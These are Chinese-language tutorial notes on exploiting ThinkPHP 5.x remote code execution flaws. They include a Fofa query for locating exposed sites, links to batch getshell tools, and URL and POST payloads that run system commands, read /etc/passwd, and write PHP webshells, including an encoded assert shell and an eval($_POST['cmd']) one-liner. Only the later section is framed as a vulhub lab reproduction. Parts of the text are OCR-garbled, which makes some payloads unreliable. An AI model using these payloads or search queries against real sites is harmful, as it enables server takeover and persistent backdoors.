15 ThinkPhp漏洞介绍及利用

ThinkPhp应用

CMS已经搭建好的网站源码

 

 

Thinkphp历史漏洞

ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell ThinkPHP5_SQL注入漏洞&&敏感信息泄露 ThinkPHP3.2.3_最新版update注入漏洞 ThinkPHP5.0.10缓存函数设计缺陷可导致Getshell ThinkPHP3.2.X_find_select_delete注入 ThinkPHP框架5.0.X_sql注入漏洞分析 ThinkPHP3.X_order_by注入漏洞 ThinkPHP5.X_order_by注入漏洞 ThinkPHP5.X 远程代码执行

 

 

Fofa收集特征

Thinkphph V5

"thinkphp"&& icon_hash="1165838194"&&country!="CNY

纯文本

 

输入/?s=1

出现错误

 

 

批量检测工具

https://github.com/Lucifer1993/TPscan
https://github.com/theLSA/tp5-getshell

 

 

 

 

ThinkPhp漏洞利用

5.0版本

| /index.php?s=index/Athink app/invokefunction&function=call user func array&vars[O]=system&vars[1]]=echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== |base64 -d >shell9.php

5.1版本

/index.php?s=index/Athinklapp/invokefunction&function=call_user_func_array&vars[0]=system&v ars[1][]=whoami /index.php?s=index/Athink\Request/input&filter=phpinfo&data=1/index.php?s=index/(think\Request/input&filter=system&data=id(dir Is) Gindex.php?s=indexAthink\template driver\file/write&cacheFile=shell.php&content=%3C?php%20 phpinfo0;?%3E /index.php?s=index/Athink\view driver\Php/display&content=%3C?php%20phpinfo0:?%3E /index.php?s=index/Athink\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&v ars[1]0=1

纯文本

 

 

 

 

 

漏洞复现

攻击机kali：ip:

环境：vulhub-master

访问漏洞环境：

 

 

输入?s=1

kali中查询thinkphp的poc

searchsploit thinkphp

searchsploit -p 46150.txt
cat  path路径

 

 

post提交数据

POST:/index.php?s=captcha
_method=_construct&fiter[]=system&method=get&server[REQUESTMETHOD]=cat /etc/passwd

纯文本

 

 

 

写入一句话木马

POST:/index.php?s=captcha
_method=_construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php
eval(\$_POST['cmd']);?>">1.php

 

 

dock创建交互命令

docker esec -it id fa......./bin/bash